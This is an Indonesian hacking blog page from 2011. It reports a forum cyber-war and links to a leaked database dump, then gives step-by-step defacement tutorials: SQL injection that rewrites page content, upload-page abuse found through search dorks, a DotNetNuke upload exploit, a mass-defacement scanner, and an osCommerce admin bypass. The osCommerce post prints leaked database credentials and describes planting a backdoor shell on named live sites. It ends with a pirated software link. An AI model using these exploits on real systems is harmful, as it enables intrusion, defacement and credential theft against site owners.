Wednesday, January 12, 2011

XCODE vs Yogyacarderlink

Perang cyber memang sering terjadi, apalagi perang antar saudara, Pada tahun 2010 yang lalu memang menjadi ajang gengsi dan ajang adu skill.  dimana dua kubu forumhacker saling menyerang. Hacker Newbie yang bertempur melawan Yogyacarderlink dimana tidak ada yang menang menurut saya, pasalanya sama sama down. tapi mungkin menurut pendapat anda berbeda bukan? silahkan anda yang menilai.

Di kubu lain juga mendapat perhatian yang cukup menegangkan, antara forum hacker Devilzc0de harus saling menyerang dengan forum Underground indonesia Server Is Down yang sama sama saling menyerang dan al akhir tidak ada yang menang menurut saya.

Di awal tahun 2011 perang cyber terjadi kembali saat hacker indonesia bermunculan, baik forum maupun team. Dedengkot Hacker di Indonesia Yogyafree yang di ganti nama menjadi XCODE harus saling serang dengan teman satu namanya Yogyacarderlink. Dan ini cukup menjadi perhatian public. Apa masalah dan siapa yang menajdi masalah? Jika saya jawab kali ini saya tidak dapat menyebutkan dan hanya geleng kepala saja.

Yogyacarderlink yang di dirikan dengan moto "we can do all what you can do. we can do all what you can't do" berhasil membobol forum ternama di indonesia. Tidak mau kalah dengan forum yang menurut XCODE baru didirikan setelah nya maka para admin segera mungkin melancarkan serangan kepada YCL (orang memanggilanya). Setelah saya telusuri dan saya bertemu dengan salah satu admin YCL beliau menegaskan bahwa "Server YCL lagi di pindah dan di maintenance di data center, kemungkinan akan UP lagi akhir januari atau februari" ucap salah satu admin (v3n0m). dan setelah saya telusuri di situs jejaring sosial, banyak gosip mengatakan bahwa YCL di DDOS ATTACK oleh XCODE itu bisa benar bisa tidak dengan kenyataanya, tapi saya sebelumnya sudah menanyakan hal demikian.

Intinya peperangan ini tidak baik  di lakukan bagi kita, hanya orang yang bermasalah dan berkepentingan saja yang bisa mengerti dan menyelesaikannya. sebaiknya kita tunggu sampai  apa yang akan terjadi selanjutnya.
Berikut gambaran YCL menyerang XCODE dengan beberapa teknik. Semoga bermanfaat.
 
Live Video :
http://www.abdeesouji.biz/xcode.swf

Dump Database XCODE :
http://www.abdeesouji.biz/xcode.rar
 
Dikutip Dari : http://code-security.blogspot.com/2011/01/xcode-vs-yogyacarderlink.html
READ MORE -

Saturday, January 8, 2011

Deface Web .asp Tanpa Login

2. buka web asp yang mau kamu deface...
misal: http://contohweb.com.my/ViewNews.asp?RefNo=42
3. tambahkan having 1=1 didepannya,,,jadinya= http://www.contohweb.com.my/berita.asp?id=42 having 1=1

4. maka akan muncul error seperti ini:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'News.NsID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/ViewNews.asp, line 8


5. ganti url nya menjadi http://www.contohweb.com.my/berita.asp?id=42 group by News.NsID having 1=1 (perhatikan perubahan url,)

6. akan muncul error berikut:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'News.NsDate' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/ViewNews.asp, line 8


7. ganti url-nya menjadi: http://www.contohweb.com.my/berita.asp?id=42 group by News.NsID,News.NsDate having 1=1 (perhatikan perubahan url)

8. akan muncul error seperti ini:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'News.NsTitle' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/ViewNews.asp, line 8


9. nah,dapt tuh column and table nya = nstitle dan news
10. selanjutnya langkah injeksi
11. gunakan url berikut: http://www.contohweb.com.my/berita.asp?id=42 update news set NsTitle='Hacked by namakamu';--
12. refresh,jadi deh,... 

 Created By Mhiman HNc 

READ MORE -

Tutorial Deface Web Untuk Pemula

Halo semua, kembali lagi bersama Mhiman HNc dalam acara dan agenda yang sama (obsesi jadi presenter),,kwwkkw
baiklah,kali ini saya akan membahas sedikit yang tahu ttg deface web,berhubung saya ini pemula,maka saya beri judul bagi pemula..
nah,kali ini kita akan menggunakan celah untuk bisa mengupload suatu html.

supaya mudah memahami,saya buat dalam bentuk poin2 aja ya,,,,
mulai deh...
ok langsung aja ya gan :

*klik salah satu pesan/iklan dari adsensecamp dibawah posting ini
*anda akan dibawa ke sebuah web hasil klik anda

selanjutnya
*ganti url web tersebut dengan http://google.com
*masukkan dork berikut: inurl:"/cgi-bin/ourspace/"

* cari salah satu web.oke, saya memilih ini:
http://www.freewhiz.com/latinos//cgi-bin/ourspace//login.cgi?article=

* kemudian ganti /cgi-bin/ourspace//login.cgi
dengan /cgi-bin/ourspace/newswire/uploadmedia.cgi

*maka url yang dimaksud adalah :
http://www.freewhiz.com/latinos//cgi-bin/ourspace/newswire/uploadmedia.cgi?article=

*akan muncul halaman tempat upload file, buat html mu,(buat yang keren ya)ehehhe...
simpan dengan nama (terserah).txt.html
*upload
*selsai deh 


Created By Mhiman HNc
READ MORE -

Friday, January 7, 2011

DNN (dotnetnuke) remote file Upload Vulnerability


dork : inurl:portals/0/

Setelah anda Menemukan jalan DNN kemudian pergi ke file ini
expl : 127.1.0.0/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Pilih: File (A File Pada Situs Anda)
setelah Loading maka Pasang java script di bawah ini pada addres bar url browser anda
javascript: __doPostBack (‘$ ctlURL cmdUpload’,”)
sekarang Anda melihat Browse
root folder pilih dan file Anda akan meng-upload ke
situs/dnn path/Portals/0
Catatan: Anda hanya dapat meng-upload *. swf, *. jpg, *. jpeg, *. JPE, *. gif, *. bmp, *. png, *. doc, *. xls, *. ppt, *. pdf, *. txt, *. xml, *. xsl, *. css, *. zip, *. 3gp, *. asf, *. asx, *. avi, *. flv, *. m4v, *. mov, *. mp4, *. mpe, *. mpeg, *. mpg, *. ram, *. rm, *. rmvb, *. wm, *. wmv, *. vob
oleh defualt tetapi admin dapat mengubah ini dan Anda akan memiliki Shell
demo : http://www.dav.gov.vn/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
hasil : http://www.dav.gov.vn/Portals/0/magelangcyber.txt

 

READ MORE -

Tool Deface osCommerce Scanner v1 Auto Subdir Defaceing By Hmei7

 Pertama-tama Ane Ucapin Terima Kasih Sama Kang Hmei7...Mungkin Tool Ini Sangad Berguna Bagi Yang Hobby Deface...

Cekidot Bro : http://jundab.co.tv/osCommerce_scanner_v1.rar

untuk step by step proses scanning nya ane kasih langkah² di bawah ini :

1. buka tools nya mas bro

2. Browse Target ( kumpulan web osCommerse yang sudah di save dalam file.txt )

3. Edit pengaturan script deface kamu, masuk ke PENGATURAN dan edit, kalo sudah selesai klik kembali icon HIDE ME

4. Klik scan dan tunggu hasilnya,


5. tunggu saja dan nikmati hasil auto scan sub defacing dari master hmei7 ini
croot gan..!

nb*
dalam folder osCommerce_scanner_v1 di pc anda akan auto creat file vuln.txt dan zh.txt , vuln.txt = web yang sukses sub defacing, zh.txt = web yang sukses posting di zone-h ( dengan catatan belum pernah di submit sebelumnya
).

READ MORE -

Thursday, January 6, 2011

Cara Upload Backdoor Di osCommerce

 

ok, lasung aja ea, jalan2 ke sana sini, nemu exploit ttg osCommerce ya udah lah, lsg jajal eh akhirnya bisa juga… hehehehh, gini nie explot yg ada di site itu,

# ByPass Page Admin :

You can use this Trick if admin folder not protected by Mhiman HNc code

if you Want to explore admin page without login. You can use /login.php behind the name of the file

Example :

http://[site]/admin/backup.php/login.php

or

http://[site]/admin/file_manager.php/login.php

Demo :

http://server/store/admin/file_manager.php/login.php

You can See all file in Directory Oscommerce.. haha ;)

and you can download all file with tRick above

# File Disclosure :

in : admin/file_manager.php/login.php?action=download&filename=

Exploit : admin/file_manager.php/login.php?action=download&filename=/includes/configure.php

Example : http://[site]/[path]/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php

ok, sekarang kita cari targetnya dgn dork “Powered by osCommerce” tanpa tanda titik ya :D

utk percobaan kita pake trget ini : http://osc22ms2-cyberoffice.1fonet.fr/catalog
nah, kita cari dulu nie admin page nya , jadinya http://osc22ms2-cyberoffice.1fonet.fr/catalog/admin/login.php nah, ketemu deh… :)

sekarang, kita pake exploitnya jadinya : http://osc22ms2-cyberoffice.1fonet.fr/catalog/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php nah kita mendapatkan configure.php, lsg aja deh kita download :D

selanjutnya, setelah kita download kita buka menggunakan notepad ato yg laen deh, nah itu tampak deh, kita coba dl masuk ke database tanpa masuk ke adminnya dgn yg kita dapatkan,

define(‘DB_SERVER_USERNAME’, ‘laurent’);
define(‘DB_SERVER_PASSWORD’, ‘UQzlZ0vrHEiu’);

habis kita dptkan yg kyk gitu, marilah kita buka melalui FTP, di sini saya menggunakan FileZila,
alhamdulillah sukses :genit: , marilah kita upload backdoor kita, biasanya sih di public_html, tp dsini saya upload di httpdocs, setelah success upload backdoor, lalu kita cek.
http://osc22ms2-cyberoffice.1fonet.fr/shell-yg-kita-pasang, oke trnyata sudah terpasang, monggo silakan di lanjut pembantaiannya..

maaf ya klo agak ribet tulisannya, soalnya jarang buat tutorial kang


 

READ MORE -

Wednesday, January 5, 2011

Easy GIF Animator Pro v4.6.0.34+Full 

[Image: 39358_1246154412460_1787428369_497294_7411926_n.jpg]

Mungkin Aplikasi ini sudah banyak pada tau...
jadi yg belum tau coba aj...
ini software adalh membuat animasi sederhana dan sangat gampang...
selain itu animasi ini bZ membbuat animasi banner dan animasi button...Soooo percantik Website kamu or blog kamu...
selamet mencobaa....
http://www.indowebster.com/Easy_GIF_Animator_4_Pro.html
READ MORE -
Template by : mhiman@ hacker-newbie.org